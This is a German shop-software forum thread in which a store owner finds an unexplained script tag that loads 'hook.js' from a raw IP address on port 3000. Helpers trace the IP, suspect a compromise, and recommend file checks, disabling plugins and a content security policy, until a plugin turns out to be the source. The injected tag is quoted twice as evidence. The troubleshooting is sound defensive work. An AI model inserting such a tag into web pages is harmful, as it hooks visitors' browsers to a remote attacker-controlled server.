Neu Script - Fehler im Code

isopix

Aktives Mitglied
5. Juli 2016
11
0
hallo, seit Tagen werden die Bilder auf unseren Produktseiten extrem langsam geladen. Bei der Suche nach dem Fehler sind wir beim Validieren von HTML auf diese Zeile gestoßen:
<script src="https://37.139.8.73:3000/hook.js" type="text/javascript"><\/script></script>
Vor dem Ende-Tag steht diese Bezeichnung <\/script>, die als Fehler gemeldet wird.

Kann mit bitte jemand sagen, an welcher Stelle bzw. im welcher tpl-Datei ich das ändern kann?

vg Georg
 

Nicson

Sehr aktives Mitglied
29. August 2012
516
94
Bayern
Also wenn dein Server nich zufällig in Schweden steht ... würde ich sagen das is n Hack ...?

8 34 ms 33 ms 33 ms adm-b2-link.telia.net [62.115.141.63]
9 33 ms 47 ms 33 ms digitalocean-ic-304182-adm-b2.c.telia.net [213.248.84.118]
10 35 ms 33 ms 33 ms 138.197.250.47
11 32 ms 32 ms 32 ms 37.139.8.73

Sieht nach nem privaten Provideranschluss aus.
 

isopix

Aktives Mitglied
5. Juli 2016
11
0
Danke für die Hinweise.
Ich würde diese Codzeile gern löschen, weiß aber nicht, wie bzw. wo ich diese finden kann.
Kann mit bitte jemand sagen, an welcher Stelle bzw. im welcher tpl-Datei ich das ändern kann?
 

FPrüfer

Moderator
Mitarbeiter
19. Februar 2016
1.881
527
Halle
Ich würde diese Codzeile gern löschen, weiß aber nicht, wie bzw. wo ich diese finden kann.
Kann mit bitte jemand sagen, an welcher Stelle bzw. im welcher tpl-Datei ich das ändern kann?
Wie Martin schon sagte, das ist kein Bestandteil des Shopcodes, deshalb kann auch keiner wissen wo das herkommt. Möglich ist ein Plugin oder wie auch schon erwähnt hat jemand deinen Server kompromitiert und irgendwo Code eingeschleußt.
Erste Anlaufstelle wäre also der Dateicheck im Backend und das Deaktivieren aller Plugins. Je nach Ergebnis gehts dann weiter...
 

lj-shadow

Sehr aktives Mitglied
15. März 2013
466
47
Vielleicht solltest du nebenbei auch gleich die content policy für deine domain setzen.
Dann wird die Datei wenigstens schon mal nicht mehr ausgeführt bzw. geblockt, bis du die Herkunft des codes gefunden hast.
 

isopix

Aktives Mitglied
5. Juli 2016
11
0
hallo, bin nochmal zu diesem Thema hier.
Im Quelltext unseres Shops www.flammkuchen24.de wird vor dem body-end-tag folgendes Script aufgerufen aber nicht ausgeführt mit dem Hinweis: "Laden fehlgeschlagen für das <script> mit der Quelle "https://37.139.8.73:3000/hook.js" ". Der Vorgang bremst den Seitenaufruf extrem aus.

Dies ist das Script vor dem body-end-tag
<script src="https://37.139.8.73:3000/hook.js" type="text/javascript"><\/script></script>
</body>
</html>

Wie kann ich den Quelltext oder das auslösende Element aufrufen, damit ich das Script löschen kann?
vg Georg
 

Xantiva

Sehr aktives Mitglied
28. August 2016
1.795
316
Düsseldorf
Hast Du schon mal im Backend den Dateicheck ausgeführt? System : Wartung : Status => Dateistruktur => Details oder /admin/filecheck.php

Oder laden den SourceCode vom Shop runter und vergleiche mit Tools wie WinMerge den original Quellcode mit Deiner Version.

Nachtrag: Prüfe - wenn möglich - das ftp Log um zu sehen, ob und welche Dateien modifiziert wurden.
 

css-umsetzung

Offizieller Servicepartner
SPBanner
6. Juli 2011
7.879
2.218
Berlin
Firma
css-umsetzung
schalt doch mal alle Plugins ab die du hast um zu sehen ob das JS davon kommt, wenn nicht musst du in deinen Quellcodes schauen
 

isopix

Aktives Mitglied
5. Juli 2016
11
0
Dateicheck habe ich durchgeführt: keine Probleme entdeckt.

@css-umsetzung: "wenn nicht musst du in deinen Quellcodes schauen " = Meine Frage ist, wie kann ich das Script aus dem Quellcode löschen. Wie komme ich an die entsprechende Stellem um das Script dort hzu entfernen.
 

lj-shadow

Sehr aktives Mitglied
15. März 2013
466
47
Meine Frage ist, wie kann ich das Script aus dem Quellcode löschen.

Deine erste Frage sollte sein: Wie kann ich den Code finden?
Damit klärt sich erst mal, wo der überhaupt ist.

DANN: WIE kann ich den löschen? Das dürfte sich dann recht schnell machen lassen.

und das wichtigste: Wo kommt der eig. her? Warum ist der da? Wer hat ihn platziert? (Darum ja das "schalt mal alle Plugins ab")
Wenn der dabei verschwindet und du Deine Plugins nacheinander wieder aktivierst, solltest du den "schuldigen" finden.


EDIT - zum wie finden:
Solltest Du shell-Zugriff haben, such doch mal recursiv nach dem Code in deinem Serververzeichis - natürlich nach Dateiinhalt suchen.
Wenn nicht, lade dir den Shop doch mal runter (ohne Bilder usw.) und mach das offline
 

isopix

Aktives Mitglied
5. Juli 2016
11
0
Bei letzten Test hatte ich etwas übersehen. Als ich jetzt die Plugins nochmal geprüft habe, habe ich ein Plugin als Fehlerquelle gefunden!
Ich danke allen für Ihre Unterstützung.
 

Rico Giesler

Offizieller Servicepartner
SPBanner
10. Mai 2017
13.244
1.521
Wenn es ein Standardplugin ist wäre für andere User interessant welches.
Damit sie beim gleichen Problem einen Lösungsansatz haben.
 
Ähnliche Themen
Titel Forum Antworten Datum
Neu Aliexpress und Amazon Rechnungen runterladen - freies Tampermonkey Script Smalltalk 0
Neu Fehler nach Update Produktseiten nicht mehr aufrufbar Installation / Updates von JTL-Shop 1
Neu Laufweg nicht mehr korrekt. Wir finden den Fehler nicht Arbeitsabläufe in JTL-WMS / JTL-Packtisch+ 0
Neu SQL Code für GPSR Felder (Kaufland) zeigt Fehler + wird daher nicht übertragen kaufland.de - Anbindung (SCX) 0
Neu Fehler 500 im Child-Template nach Umstieg von 5.3.3 auf 5.5.3 Templates für JTL-Shop 8
Neu Fehler beim Übertragen von Bildern JTL - Shopware Thumbnail Problem height width dürfen nicht leer sein Shopware-Connector 5
Neu VCS Fehler: keine Belege wegen eines deaktivierten Amazon Umsatzsteuer-Berechnungsservices Amazon-Anbindung - Fehler und Bugs 0
Neu Artikelseiten 500 HTTP Fehler PayPal Plugin 2.1.0 JTL Shop 5.4.0 Plugins für JTL-Shop 4
Neu Lister 2.0 "Verkäuferinventar anfordern" Fehler Amazon-Lister - Fehler und Bugs 0
Neu PayPal - PayPal Checkout - 221 – SQL Fehler Plugins für JTL-Shop 0
Neu Fehler bei Abgleich mit Shopify Shopify-Connector 5
Neu unicorn2 Etsy listen nicht möglich - Fehler Artikelgewicht Schnittstellen Import / Export 8
Neu Fehler bei Versandbestätigung seit 28.07.2025 Amazon-Anbindung - Fehler und Bugs 2
Hood SCX Schnittstelle mit Listing Fehler JTL-Wawi 1.10 1
Neu PHP message: PHP Fatal error -> Seite nicht mehr aufrufbar (Fehler 500) Installation / Updates von JTL-Shop 1
Neu Shopify-Connector: Fehler "delivery_note table doesn't exist" beim Lieferschein-Abgleich Shopify-Connector 4
Neu FEHLER: eBay-Auktionen Upload nicht möglich, Fehlercodes helfen nicht weiter [Error 21917328 & 21920203] eBay-Anbindung - Fehler und Bugs 2
Neu Unnötiger Fehler beim Import von Kundendaten JTL-Shop - Fehler und Bugs 0
Neu Dringendes Problem: Bildabgleich nach Connector-Fix – "Parameter resourceUrl is empty" Fehler Shopify-Connector 4
Abgleich wird abgebrochen durch diesen Fehler Shopify-Connector 7
Neu Worker macht Fehler nach Update. kein Abgleich möglich Betrieb / Pflege von JTL-Shop 1
Neu Fehler Sie können aktuell keine Benutzer-Lizenzen für WMS bzw. WMS Mobile buchen Installation von JTL-WMS / JTL-Packtisch+ 9
Neu Fehler bei Abgleich WooCommerce-Connector 1
Neu EAN Fehler beim Etikettendruck User helfen Usern - Fragen zu JTL-Wawi 5
Neu Shopware 6.6.10.2 Abgleich zu JTL | Bilder Übertragung Fehler: Path cannot be empty Shopware-Connector 0
GLS-Retourenlabel – Fehler bei Feld 'Name1', obwohl DPD funktioniert JTL-Wawi 1.9 0
Neu Ständig wiederkehrender Fehler beim Ableich des Lister 2.0 Amazon-Lister - Fehler und Bugs 5
Zahlungsmodul - PayPal Fehler: kein lauschender Endpunkt JTL-Wawi 1.9 0
Neu DHL Labels kommen sehr stark verzögert raus oder Fehler: "Die HTTP-Anforderung wurde mit Clientauthentifizierungsschema "Anonymous" nicht zugelassen." JTL-ShippingLabels - Fehler und Bugs 1
Neu Fehler beim JTL-Worker – "Der Remoteserver hat einen Fehler zurückgegeben: (502) Ungültiges Gateway" (Shopify) JTL-Wawi - Fehler und Bugs 2
Neu DHL Fehler "Großkundenempfänger" JTL-ShippingLabels - Fehler und Bugs 0
Neu JTL Debug 2.0.4 und Shop 5.5.2 - Fehler 500 Plugins für JTL-Shop 3
Neu NOVA Theme Fehler - 5.5.2 JTL-Shop - Fehler und Bugs 11
Neu Upload-Dateien: Fehler beim Abgleich Onlineshop-Anbindung 0
Neu Paypal Plugin läßt sich nicht installieren - SQL Fehler Plugins für JTL-Shop 2
Neu Plugin Fehler JTL-Shop - Fehler und Bugs 7
Fehler in der JTL-Wawi-Anzeige, ob ein Artikel bereits einem Onlineshop zugeordnet wurde. JTL-Wawi 1.10 5
Neu Fehler DHL Auslandsversand JTL-ShippingLabels - Fehler und Bugs 12
neue Zahlungsart "Barter", trotzdem erscheint "Zahlung per Überweisung und QR-Code" JTL-Wawi 1.10 1
Sonderzeichen via HTML Entity Code JTL-Wawi 1.6 1

Ähnliche Themen